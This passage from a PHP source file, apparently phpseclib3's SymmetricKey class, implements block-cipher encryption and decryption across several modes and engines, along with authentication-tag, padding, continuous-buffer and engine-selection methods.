self::MODE_OFB: return $this->openssl_ofb_process($plaintext, $this->encryptIV, $this->enbuffer); } } if ($this->engine === self::ENGINE_MCRYPT) { set_error_handler(function () { }); if ($this->enchanged) { mcrypt_generic_init($this->enmcrypt, $this->key, $this->getIV($this->encryptIV)); $this->enchanged = false; } // re: {@link http://phpseclib.sourceforge.net/cfb-demo.phps} // using mcrypt's default handing of CFB the above would output two different things. using phpseclib's // rewritten CFB implementation the above outputs the same thing twice. if ($this->mode == self::MODE_CFB && $this->continuousBuffer) { $block_size = $this->block_size; $iv = &$this->encryptIV; $pos = &$this->enbuffer['pos']; $len = strlen($plaintext); $ciphertext = ''; $i = 0; if ($pos) { $orig_pos = $pos; $max = $block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } $ciphertext = substr($iv, $orig_pos) ^ $plaintext; $iv = substr_replace($iv, $ciphertext, $orig_pos, $i); $this->enbuffer['enmcrypt_init'] = true; } if ($len >= $block_size) { if ($this->enbuffer['enmcrypt_init'] === false || $len > $this->cfb_init_len) { if ($this->enbuffer['enmcrypt_init'] === true) { mcrypt_generic_init($this->enmcrypt, $this->key, $iv); $this->enbuffer['enmcrypt_init'] = false; } $ciphertext .= mcrypt_generic($this->enmcrypt, substr($plaintext, $i, $len - $len % $block_size)); $iv = substr($ciphertext, -$block_size); $len %= $block_size; } else { while ($len >= $block_size) { $iv = mcrypt_generic($this->ecb, $iv) ^ substr($plaintext, $i, $block_size); $ciphertext .= $iv; $len -= $block_size; $i += $block_size; } } } if ($len) { $iv = mcrypt_generic($this->ecb, $iv); $block = $iv ^ substr($plaintext, -$len); $iv = substr_replace($iv, $block, 0, $len); $ciphertext .= $block; $pos = $len; } restore_error_handler(); return $ciphertext; } $ciphertext = mcrypt_generic($this->enmcrypt, $plaintext); if (!$this->continuousBuffer) { mcrypt_generic_init($this->enmcrypt, $this->key, $this->getIV($this->encryptIV)); } restore_error_handler(); return $ciphertext; } if ($this->engine === self::ENGINE_EVAL) { $inline = $this->inline_crypt; return $inline('encrypt', $plaintext); } $buffer = &$this->enbuffer; $block_size = $this->block_size; $ciphertext = ''; switch ($this->mode) { case self::MODE_ECB: for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $ciphertext .= $this->encryptBlock(substr($plaintext, $i, $block_size)); } break; case self::MODE_CBC: $xor = $this->encryptIV; for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); $block = $this->encryptBlock($block ^ $xor); $xor = $block; $ciphertext .= $block; } if ($this->continuousBuffer) { $this->encryptIV = $xor; } break; case self::MODE_CTR: $xor = $this->encryptIV; if (strlen($buffer['ciphertext'])) { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); if (strlen($block) > strlen($buffer['ciphertext'])) { $buffer['ciphertext'] .= $this->encryptBlock($xor); Strings::increment_str($xor); } $key = Strings::shift($buffer['ciphertext'], $block_size); $ciphertext .= $block ^ $key; } } else { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); $key = $this->encryptBlock($xor); Strings::increment_str($xor); $ciphertext .= $block ^ $key; } } if ($this->continuousBuffer) { $this->encryptIV = $xor; if ($start = strlen($plaintext) % $block_size) { $buffer['ciphertext'] = substr($key, $start) . $buffer['ciphertext']; } } break; case self::MODE_CFB: // cfb loosely routines inspired by openssl's: // {@link http://cvs.openssl.org/fileview?f=openssl/crypto/modes/cfb128.c&v=} if ($this->continuousBuffer) { $iv = &$this->encryptIV; $pos = &$buffer['pos']; } else { $iv = $this->encryptIV; $pos = 0; } $len = strlen($plaintext); $i = 0; if ($pos) { $orig_pos = $pos; $max = $block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } // ie. $i = min($max, $len), $len-= $i, $pos+= $i, $pos%= $blocksize $ciphertext = substr($iv, $orig_pos) ^ $plaintext; $iv = substr_replace($iv, $ciphertext, $orig_pos, $i); } while ($len >= $block_size) { $iv = $this->encryptBlock($iv) ^ substr($plaintext, $i, $block_size); $ciphertext .= $iv; $len -= $block_size; $i += $block_size; } if ($len) { $iv = $this->encryptBlock($iv); $block = $iv ^ substr($plaintext, $i); $iv = substr_replace($iv, $block, 0, $len); $ciphertext .= $block; $pos = $len; } break; case self::MODE_CFB8: $ciphertext = ''; $len = strlen($plaintext); $iv = $this->encryptIV; for ($i = 0; $i < $len; ++$i) { $ciphertext .= ($c = $plaintext[$i] ^ $this->encryptBlock($iv)); $iv = substr($iv, 1) . $c; } if ($this->continuousBuffer) { if ($len >= $block_size) { $this->encryptIV = substr($ciphertext, -$block_size); } else { $this->encryptIV = substr($this->encryptIV, $len - $block_size) . substr($ciphertext, -$len); } } break; case self::MODE_OFB8: $ciphertext = ''; $len = strlen($plaintext); $iv = $this->encryptIV; for ($i = 0; $i < $len; ++$i) { $xor = $this->encryptBlock($iv); $ciphertext .= $plaintext[$i] ^ $xor; $iv = substr($iv, 1) . $xor[0]; } if ($this->continuousBuffer) { $this->encryptIV = $iv; } break; case self::MODE_OFB: $xor = $this->encryptIV; if (strlen($buffer['xor'])) { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); if (strlen($block) > strlen($buffer['xor'])) { $xor = $this->encryptBlock($xor); $buffer['xor'] .= $xor; } $key = Strings::shift($buffer['xor'], $block_size); $ciphertext .= $block ^ $key; } } else { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $xor = $this->encryptBlock($xor); $ciphertext .= substr($plaintext, $i, $block_size) ^ $xor; } $key = $xor; } if ($this->continuousBuffer) { $this->encryptIV = $xor; if ($start = strlen($plaintext) % $block_size) { $buffer['xor'] = substr($key, $start) . $buffer['xor']; } } break; case self::MODE_STREAM: $ciphertext = $this->encryptBlock($plaintext); break; } return $ciphertext; } /** * Decrypts a message. * * If strlen($ciphertext) is not a multiple of the block size, null bytes will be added to the end of the string until * it is. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::encrypt() * @param string $ciphertext * @return string $plaintext * @throws \LengthException if we're inside a block cipher and the ciphertext length is not a multiple of the block size */ public function decrypt($ciphertext) { if ($this->paddable && strlen($ciphertext) % $this->block_size) { throw new \LengthException('The ciphertext length (' . strlen($ciphertext) . ') needs to be a multiple of the block size (' . $this->block_size . ')'); } $this->setup(); if ($this->mode == self::MODE_GCM || isset($this->poly1305Key)) { if ($this->oldtag === false) { throw new InsufficientSetupException('Authentication Tag has not been set'); } if (isset($this->poly1305Key)) { $newtag = $this->poly1305($ciphertext); } else { $oldIV = $this->iv; Strings::increment_str($this->iv); $cipher = new static('ctr'); $cipher->setKey($this->key); $cipher->setIV($this->iv); $plaintext = $cipher->decrypt($ciphertext); $s = $this->ghash( self::nullPad128($this->aad) . self::nullPad128($ciphertext) . self::len64($this->aad) . self::len64($ciphertext) ); $cipher->encryptIV = $this->iv = $this->encryptIV = $this->decryptIV = $oldIV; $newtag = $cipher->encrypt($s); } if ($this->oldtag != substr($newtag, 0, strlen($newtag))) { $cipher = clone $this; unset($cipher->poly1305Key); $this->usePoly1305 = false; $plaintext = $cipher->decrypt($ciphertext); $this->oldtag = false; throw new BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } $this->oldtag = false; return $plaintext; } if ($this->engine === self::ENGINE_OPENSSL) { switch ($this->mode) { case self::MODE_STREAM: $plaintext = openssl_decrypt($ciphertext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); break; case self::MODE_ECB: $plaintext = openssl_decrypt($ciphertext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); break; case self::MODE_CBC: $offset = $this->block_size; $plaintext = openssl_decrypt($ciphertext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->decryptIV); if ($this->continuousBuffer) { $this->decryptIV = substr($ciphertext, -$offset, $this->block_size); } break; case self::MODE_CTR: $plaintext = $this->openssl_ctr_process($ciphertext, $this->decryptIV, $this->debuffer); break; case self::MODE_CFB: // cfb loosely routines inspired by openssl's: // {@link http://cvs.openssl.org/fileview?f=openssl/crypto/modes/cfb128.c&v=} $plaintext = ''; if ($this->continuousBuffer) { $iv = &$this->decryptIV; $pos = &$this->debuffer['pos']; } else { $iv = $this->decryptIV; $pos = 0; } $len = strlen($ciphertext); $i = 0; if ($pos) { $orig_pos = $pos; $max = $this->block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } // ie. $i = min($max, $len), $len-= $i, $pos+= $i, $pos%= $this->blocksize $plaintext = substr($iv, $orig_pos) ^ $ciphertext; $iv = substr_replace($iv, substr($ciphertext, 0, $i), $orig_pos, $i); $ciphertext = substr($ciphertext, $i); } $overflow = $len % $this->block_size; if ($overflow) { $plaintext .= openssl_decrypt(substr($ciphertext, 0, -$overflow), $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv); if ($len - $overflow) { $iv = substr($ciphertext, -$overflow - $this->block_size, -$overflow); } $iv = openssl_encrypt(str_repeat("\0", $this->block_size), $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv); $plaintext .= $iv ^ substr($ciphertext, -$overflow); $iv = substr_replace($iv, substr($ciphertext, -$overflow), 0, $overflow); $pos = $overflow; } elseif ($len) { $plaintext .= openssl_decrypt($ciphertext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv); $iv = substr($ciphertext, -$this->block_size); } break; case self::MODE_CFB8: $plaintext = openssl_decrypt($ciphertext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->decryptIV); if ($this->continuousBuffer) { if (($len = strlen($ciphertext)) >= $this->block_size) { $this->decryptIV = substr($ciphertext, -$this->block_size); } else { $this->decryptIV = substr($this->decryptIV, $len - $this->block_size) . substr($ciphertext, -$len); } } break; case self::MODE_OFB8: $plaintext = ''; $len = strlen($ciphertext); $iv = $this->decryptIV; for ($i = 0; $i < $len; ++$i) { $xor = openssl_encrypt($iv, $this->cipher_name_openssl_ecb, $this->key, $this->openssl_options, $this->decryptIV); $plaintext .= $ciphertext[$i] ^ $xor; $iv = substr($iv, 1) . $xor[0]; } if ($this->continuousBuffer) { $this->decryptIV = $iv; } break; case self::MODE_OFB: $plaintext = $this->openssl_ofb_process($ciphertext, $this->decryptIV, $this->debuffer); } return $this->paddable ? $this->unpad($plaintext) : $plaintext; } if ($this->engine === self::ENGINE_MCRYPT) { set_error_handler(function () { }); $block_size = $this->block_size; if ($this->dechanged) { mcrypt_generic_init($this->demcrypt, $this->key, $this->getIV($this->decryptIV)); $this->dechanged = false; } if ($this->mode == self::MODE_CFB && $this->continuousBuffer) { $iv = &$this->decryptIV; $pos = &$this->debuffer['pos']; $len = strlen($ciphertext); $plaintext = ''; $i = 0; if ($pos) { $orig_pos = $pos; $max = $block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } // ie. $i = min($max, $len), $len-= $i, $pos+= $i, $pos%= $blocksize $plaintext = substr($iv, $orig_pos) ^ $ciphertext; $iv = substr_replace($iv, substr($ciphertext, 0, $i), $orig_pos, $i); } if ($len >= $block_size) { $cb = substr($ciphertext, $i, $len - $len % $block_size); $plaintext .= mcrypt_generic($this->ecb, $iv . $cb) ^ $cb; $iv = substr($cb, -$block_size); $len %= $block_size; } if ($len) { $iv = mcrypt_generic($this->ecb, $iv); $plaintext .= $iv ^ substr($ciphertext, -$len); $iv = substr_replace($iv, substr($ciphertext, -$len), 0, $len); $pos = $len; } restore_error_handler(); return $plaintext; } $plaintext = mdecrypt_generic($this->demcrypt, $ciphertext); if (!$this->continuousBuffer) { mcrypt_generic_init($this->demcrypt, $this->key, $this->getIV($this->decryptIV)); } restore_error_handler(); return $this->paddable ? $this->unpad($plaintext) : $plaintext; } if ($this->engine === self::ENGINE_EVAL) { $inline = $this->inline_crypt; return $inline('decrypt', $ciphertext); } $block_size = $this->block_size; $buffer = &$this->debuffer; $plaintext = ''; switch ($this->mode) { case self::MODE_ECB: for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $plaintext .= $this->decryptBlock(substr($ciphertext, $i, $block_size)); } break; case self::MODE_CBC: $xor = $this->decryptIV; for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $block = substr($ciphertext, $i, $block_size); $plaintext .= $this->decryptBlock($block) ^ $xor; $xor = $block; } if ($this->continuousBuffer) { $this->decryptIV = $xor; } break; case self::MODE_CTR: $xor = $this->decryptIV; if (strlen($buffer['ciphertext'])) { for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $block = substr($ciphertext, $i, $block_size); if (strlen($block) > strlen($buffer['ciphertext'])) { $buffer['ciphertext'] .= $this->encryptBlock($xor); Strings::increment_str($xor); } $key = Strings::shift($buffer['ciphertext'], $block_size); $plaintext .= $block ^ $key; } } else { for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $block = substr($ciphertext, $i, $block_size); $key = $this->encryptBlock($xor); Strings::increment_str($xor); $plaintext .= $block ^ $key; } } if ($this->continuousBuffer) { $this->decryptIV = $xor; if ($start = strlen($ciphertext) % $block_size) { $buffer['ciphertext'] = substr($key, $start) . $buffer['ciphertext']; } } break; case self::MODE_CFB: if ($this->continuousBuffer) { $iv = &$this->decryptIV; $pos = &$buffer['pos']; } else { $iv = $this->decryptIV; $pos = 0; } $len = strlen($ciphertext); $i = 0; if ($pos) { $orig_pos = $pos; $max = $block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } // ie. $i = min($max, $len), $len-= $i, $pos+= $i, $pos%= $blocksize $plaintext = substr($iv, $orig_pos) ^ $ciphertext; $iv = substr_replace($iv, substr($ciphertext, 0, $i), $orig_pos, $i); } while ($len >= $block_size) { $iv = $this->encryptBlock($iv); $cb = substr($ciphertext, $i, $block_size); $plaintext .= $iv ^ $cb; $iv = $cb; $len -= $block_size; $i += $block_size; } if ($len) { $iv = $this->encryptBlock($iv); $plaintext .= $iv ^ substr($ciphertext, $i); $iv = substr_replace($iv, substr($ciphertext, $i), 0, $len); $pos = $len; } break; case self::MODE_CFB8: $plaintext = ''; $len = strlen($ciphertext); $iv = $this->decryptIV; for ($i = 0; $i < $len; ++$i) { $plaintext .= $ciphertext[$i] ^ $this->encryptBlock($iv); $iv = substr($iv, 1) . $ciphertext[$i]; } if ($this->continuousBuffer) { if ($len >= $block_size) { $this->decryptIV = substr($ciphertext, -$block_size); } else { $this->decryptIV = substr($this->decryptIV, $len - $block_size) . substr($ciphertext, -$len); } } break; case self::MODE_OFB8: $plaintext = ''; $len = strlen($ciphertext); $iv = $this->decryptIV; for ($i = 0; $i < $len; ++$i) { $xor = $this->encryptBlock($iv); $plaintext .= $ciphertext[$i] ^ $xor; $iv = substr($iv, 1) . $xor[0]; } if ($this->continuousBuffer) { $this->decryptIV = $iv; } break; case self::MODE_OFB: $xor = $this->decryptIV; if (strlen($buffer['xor'])) { for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $block = substr($ciphertext, $i, $block_size); if (strlen($block) > strlen($buffer['xor'])) { $xor = $this->encryptBlock($xor); $buffer['xor'] .= $xor; } $key = Strings::shift($buffer['xor'], $block_size); $plaintext .= $block ^ $key; } } else { for ($i = 0; $i < strlen($ciphertext); $i += $block_size) { $xor = $this->encryptBlock($xor); $plaintext .= substr($ciphertext, $i, $block_size) ^ $xor; } $key = $xor; } if ($this->continuousBuffer) { $this->decryptIV = $xor; if ($start = strlen($ciphertext) % $block_size) { $buffer['xor'] = substr($key, $start) . $buffer['xor']; } } break; case self::MODE_STREAM: $plaintext = $this->decryptBlock($ciphertext); break; } return $this->paddable ? $this->unpad($plaintext) : $plaintext; } /** * Get the authentication tag * * Only used in GCM or Poly1305 mode * * @see self::encrypt() * @param int $length optional * @return string * @throws \LengthException if $length isn't of a sufficient length * @throws \RuntimeException if GCM mode isn't being used */ public function getTag($length = 16) { if ($this->mode != self::MODE_GCM && !$this->usePoly1305) { throw new \BadMethodCallException('Authentication tags are only utilized in GCM mode or with Poly1305'); } if ($this->newtag === false) { throw new \BadMethodCallException('A tag can only be returned after a round of encryption has been performed'); } // the tag is 128-bits. it can't be greater than 16 bytes because that's bigger than the tag is. if it // were 0 you might as well be doing CTR and less than 4 provides minimal security that could be trivially // easily brute forced. // see https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf#page=36 // for more info if ($length < 4 || $length > 16) { throw new \LengthException('The authentication tag must be between 4 and 16 bytes long'); } return $length == 16 ? $this->newtag : substr($this->newtag, 0, $length); } /** * Sets the authentication tag * * Only used in GCM mode * * @see self::decrypt() * @param string $tag * @throws \LengthException if $length isn't of a sufficient length * @throws \RuntimeException if GCM mode isn't being used */ public function setTag($tag) { if ($this->usePoly1305 && !isset($this->poly1305Key) && method_exists($this, 'createPoly1305Key')) { $this->createPoly1305Key(); } if ($this->mode != self::MODE_GCM && !$this->usePoly1305) { throw new \BadMethodCallException('Authentication tags are only utilized in GCM mode or with Poly1305'); } $length = strlen($tag); if ($length < 4 || $length > 16) { throw new \LengthException('The authentication tag must be between 4 and 16 bytes long'); } $this->oldtag = $tag; } /** * Get the IV * * mcrypt requires an IV even if ECB is used * * @see self::encrypt() * @see self::decrypt() * @param string $iv * @return string */ protected function getIV($iv) { return $this->mode == self::MODE_ECB ? str_repeat("\0", $this->block_size) : $iv; } /** * OpenSSL CTR Processor * * PHP's OpenSSL bindings do not operate in continuous mode so we'll wrap around it. Since the keystream * for CTR is the same for both encrypting and decrypting this function is re-used by both SymmetricKey::encrypt() * and SymmetricKey::decrypt(). Also, OpenSSL doesn't implement CTR for all of it's symmetric ciphers so this * function will emulate CTR with ECB when necessary. * * @see self::encrypt() * @see self::decrypt() * @param string $plaintext * @param string $encryptIV * @param array $buffer * @return string */ private function openssl_ctr_process($plaintext, &$encryptIV, &$buffer) { $ciphertext = ''; $block_size = $this->block_size; $key = $this->key; if ($this->openssl_emulate_ctr) { $xor = $encryptIV; if (strlen($buffer['ciphertext'])) { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); if (strlen($block) > strlen($buffer['ciphertext'])) { $buffer['ciphertext'] .= openssl_encrypt($xor, $this->cipher_name_openssl_ecb, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); } Strings::increment_str($xor); $otp = Strings::shift($buffer['ciphertext'], $block_size); $ciphertext .= $block ^ $otp; } } else { for ($i = 0; $i < strlen($plaintext); $i += $block_size) { $block = substr($plaintext, $i, $block_size); $otp = openssl_encrypt($xor, $this->cipher_name_openssl_ecb, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); Strings::increment_str($xor); $ciphertext .= $block ^ $otp; } } if ($this->continuousBuffer) { $encryptIV = $xor; if ($start = strlen($plaintext) % $block_size) { $buffer['ciphertext'] = substr($key, $start) . $buffer['ciphertext']; } } return $ciphertext; } if (strlen($buffer['ciphertext'])) { $ciphertext = $plaintext ^ Strings::shift($buffer['ciphertext'], strlen($plaintext)); $plaintext = substr($plaintext, strlen($ciphertext)); if (!strlen($plaintext)) { return $ciphertext; } } $overflow = strlen($plaintext) % $block_size; if ($overflow) { $plaintext2 = Strings::pop($plaintext, $overflow); // ie. trim $plaintext to a multiple of $block_size and put rest of $plaintext in $plaintext2 $encrypted = openssl_encrypt($plaintext . str_repeat("\0", $block_size), $this->cipher_name_openssl, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $encryptIV); $temp = Strings::pop($encrypted, $block_size); $ciphertext .= $encrypted . ($plaintext2 ^ $temp); if ($this->continuousBuffer) { $buffer['ciphertext'] = substr($temp, $overflow); $encryptIV = $temp; } } elseif (!strlen($buffer['ciphertext'])) { $ciphertext .= openssl_encrypt($plaintext . str_repeat("\0", $block_size), $this->cipher_name_openssl, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $encryptIV); $temp = Strings::pop($ciphertext, $block_size); if ($this->continuousBuffer) { $encryptIV = $temp; } } if ($this->continuousBuffer) { $encryptIV = openssl_decrypt($encryptIV, $this->cipher_name_openssl_ecb, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); if ($overflow) { Strings::increment_str($encryptIV); } } return $ciphertext; } /** * OpenSSL OFB Processor * * PHP's OpenSSL bindings do not operate in continuous mode so we'll wrap around it. Since the keystream * for OFB is the same for both encrypting and decrypting this function is re-used by both SymmetricKey::encrypt() * and SymmetricKey::decrypt(). * * @see self::encrypt() * @see self::decrypt() * @param string $plaintext * @param string $encryptIV * @param array $buffer * @return string */ private function openssl_ofb_process($plaintext, &$encryptIV, &$buffer) { if (strlen($buffer['xor'])) { $ciphertext = $plaintext ^ $buffer['xor']; $buffer['xor'] = substr($buffer['xor'], strlen($ciphertext)); $plaintext = substr($plaintext, strlen($ciphertext)); } else { $ciphertext = ''; } $block_size = $this->block_size; $len = strlen($plaintext); $key = $this->key; $overflow = $len % $block_size; if (strlen($plaintext)) { if ($overflow) { $ciphertext .= openssl_encrypt(substr($plaintext, 0, -$overflow) . str_repeat("\0", $block_size), $this->cipher_name_openssl, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $encryptIV); $xor = Strings::pop($ciphertext, $block_size); if ($this->continuousBuffer) { $encryptIV = $xor; } $ciphertext .= Strings::shift($xor, $overflow) ^ substr($plaintext, -$overflow); if ($this->continuousBuffer) { $buffer['xor'] = $xor; } } else { $ciphertext = openssl_encrypt($plaintext, $this->cipher_name_openssl, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $encryptIV); if ($this->continuousBuffer) { $encryptIV = substr($ciphertext, -$block_size) ^ substr($plaintext, -$block_size); } } } return $ciphertext; } /** * phpseclib <-> OpenSSL Mode Mapper * * May need to be overwritten by classes extending this one in some cases * * @return string */ protected function openssl_translate_mode() { switch ($this->mode) { case self::MODE_ECB: return 'ecb'; case self::MODE_CBC: return 'cbc'; case self::MODE_CTR: case self::MODE_GCM: return 'ctr'; case self::MODE_CFB: return 'cfb'; case self::MODE_CFB8: return 'cfb8'; case self::MODE_OFB: return 'ofb'; } } /** * Pad "packets". * * Block ciphers working by encrypting between their specified [$this->]block_size at a time * If you ever need to encrypt or decrypt something that isn't of the proper length, it becomes necessary to * pad the input so that it is of the proper length. * * Padding is enabled by default. Sometimes, however, it is undesirable to pad strings. Such is the case in SSH, * where "packets" are padded with random bytes before being encrypted. Unpad these packets and you risk stripping * away characters that shouldn't be stripped away. (SSH knows how many bytes are added because the length is * transmitted separately) * * @see self::disablePadding() */ public function enablePadding() { $this->padding = true; } /** * Do not pad packets. * * @see self::enablePadding() */ public function disablePadding() { $this->padding = false; } /** * Treat consecutive "packets" as if they are a continuous buffer. * * Say you have a 32-byte plaintext $plaintext. Using the default behavior, the two following code snippets * will yield different outputs: * * * echo $rijndael->encrypt(substr($plaintext, 0, 16)); * echo $rijndael->encrypt(substr($plaintext, 16, 16)); * * * echo $rijndael->encrypt($plaintext); * * * The solution is to enable the continuous buffer. Although this will resolve the above discrepancy, it creates * another, as demonstrated with the following: * * * $rijndael->encrypt(substr($plaintext, 0, 16)); * echo $rijndael->decrypt($rijndael->encrypt(substr($plaintext, 16, 16))); * * * echo $rijndael->decrypt($rijndael->encrypt(substr($plaintext, 16, 16))); * * * With the continuous buffer disabled, these would yield the same output. With it enabled, they yield different * outputs. The reason is due to the fact that the initialization vector's change after every encryption / * decryption round when the continuous buffer is enabled. When it's disabled, they remain constant. * * Put another way, when the continuous buffer is enabled, the state of the \phpseclib3\Crypt\*() object changes after each * encryption / decryption round, whereas otherwise, it'd remain constant. For this reason, it's recommended that * continuous buffers not be used. They do offer better security and are, in fact, sometimes required (SSH uses them), * however, they are also less intuitive and more likely to cause you problems. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::disableContinuousBuffer() */ public function enableContinuousBuffer() { if ($this->mode == self::MODE_ECB) { return; } if ($this->mode == self::MODE_GCM) { throw new \BadMethodCallException('This mode does not run in continuous mode'); } $this->continuousBuffer = true; $this->setEngine(); } /** * Treat consecutive packets as if they are a discontinuous buffer. * * The default behavior. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::enableContinuousBuffer() */ public function disableContinuousBuffer() { if ($this->mode == self::MODE_ECB) { return; } if (!$this->continuousBuffer) { return; } $this->continuousBuffer = false; $this->setEngine(); } /** * Test for engine validity * * @see self::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_OPENSSL: $this->openssl_emulate_ctr = false; $result = $this->cipher_name_openssl && extension_loaded('openssl'); if (!$result) { return false; } $methods = openssl_get_cipher_methods(); if (in_array($this->cipher_name_openssl, $methods)) { return true; } // not all of openssl's symmetric cipher's support ctr. for those // that don't we'll emulate it switch ($this->mode) { case self::MODE_CTR: if (in_array($this->cipher_name_openssl_ecb, $methods)) { $this->openssl_emulate_ctr = true; return true; } } return false; case self::ENGINE_MCRYPT: set_error_handler(function () { }); $result = $this->cipher_name_mcrypt && extension_loaded('mcrypt') && in_array($this->cipher_name_mcrypt, mcrypt_list_algorithms()); restore_error_handler(); return $result; case self::ENGINE_EVAL: return method_exists($this, 'setupInlineCrypt'); case self::ENGINE_INTERNAL: return true; } return false; } /** * Test for engine validity * * @see self::__construct() * @param string $engine * @return bool */ public function isValidEngine($engine) { static $reverseMap; if (!isset($reverseMap)) { $reverseMap = array_map('strtolower', self::ENGINE_MAP); $reverseMap = array_flip($reverseMap); } $engine = strtolower($engine); if (!isset($reverseMap[$engine])) { return false; } return $this->isValidEngineHelper($reverseMap[$engine]); } /** * Sets the preferred crypt engine * * Currently, $engine could be: * * - libsodium[very fast] * * - OpenSSL [very fast] * * - mcrypt [fast] * * - Eval [slow] * * - PHP [slowest] * * If the preferred crypt engine is not available the fastest available one will be used * * @see self::__construct() * @param string $engine */ public function setPreferredEngine($engine) { static $reverseMap; if (!isset($reverseMap)) { $reverseMap = array_map('strtolower', self::ENGINE_MAP); $reverseMap = array_flip($reverseMap); } $engine = is_string($engine) ? strtolower($engine) : ''; $this->preferredEngine = isset($reverseMap[$engine]) ? $reverseMap[$engine] : self::ENGINE_LIBSODIUM; $this->setEngine(); } /** * Returns the engine currently being utilized * * @see self::setEngine() */ public function getEngine() { return self::ENGINE_MAP[$this->engine]; } /** * Sets the engine as appropriate * * @see self::__construct() */ protected function setEngine() { $this->engine = null; $candidateEngines = [ self::ENGINE_LIBSODIUM, self::ENGINE_OPENSSL_GCM, self::ENGINE_OPENSSL, self::ENGINE_MCRYPT, self::ENGINE_EVAL ]; if (isset($this->preferredEngine)) { $temp = [$this->preferredEngine]; $candidateEngines = array_merge( $temp, array_diff($candidateEngines, $temp) ); } foreach ($candidateEngines as $engine) { if ($this->isValidEngineHelper($engine)) { $this->engine = $engine; break; } } if (!$this->engine) { $this->engine = self::ENGINE_INTERNAL; } if ($this->engine != self::ENGINE_MCRYPT && $this->enmcrypt) { set_error_handler(function () { }); // Closing the current mcrypt resource(s). _mcryptSetup() will, if needed, // (re)open them with the module named in $this->cipher_name_mcrypt mcrypt_module_close($this->enmcrypt); mcrypt_module_close($this->demcrypt); $this->enmcrypt = null; $this->demcrypt = null; if ($this->ecb) { mcrypt_module_close($this->ecb); $this->ecb = null; } restore_error_handler(); } $this->changed = $this->nonIVChanged = true; } /** * Encrypts a block * * Note: Must be extended by the child \phpseclib3\Crypt\* class * * @param string $in * @return string */ abstract protected function encryptBlock($in); /** * Decrypts a block * * Note: Must be extended by the child \phpseclib3\Crypt\* class * * @param string $in * @return string */ abstract protected function decryptBlock($in); /** * Setup the key (expansion) * * Only used if $engine == self::ENGINE_INTERNAL * * Note: Must extend by the child \phpseclib3\Crypt\* class * * @see self::setup() */ abstract protected function setupKey(); /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine and flush all $buffers * Used (only) if $engine == self::ENGINE_INTERNAL * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setIV() * * - disableContinuousBuffer() * * - First run of encrypt() / decrypt() with no init-settings * * {@internal setup() is always called before en/decryption.} * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::setKey() * @see self::setIV() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } $this->changed = false; if ($this->usePoly1305 && !isset($this->poly1305Key) && method_exists($this, 'createPoly1305Key')) { $this->createPoly1305Key(); } $this->enbuffer = $this->debuffer = ['ciphertext' => '', 'xor' => '', 'pos' => 0, 'enmcrypt_init' => true]; //$this->newtag = $this->oldtag = false; if ($this->usesNonce()) { if ($this->nonce === false) { throw new InsufficientSetupException('No nonce has been defined'); } if ($this->mode == self::MODE_GCM && !in_array($this->engine, [self::ENGINE_LIBSODIUM, self::ENGINE_OPENSSL_GCM])) { $this->setupGCM(); } } else { $this->iv = $this->origIV; } if ($this->iv === false && !in_array($this->mode, [self::MODE_STREAM, self::MODE_ECB])) { if ($this->mode != self::MODE_GCM || !in_array($this->engine, [self::ENGINE_LIBSODIUM, self::ENGINE_OPENSSL_GCM])) { throw new InsufficientSetupException('No IV has been defined'); } } if ($this->key === false) { throw new InsufficientSetupException('No key has been defined'); } $this->encryptIV = $this->decryptIV = $this->iv; switch ($this->engine) { case 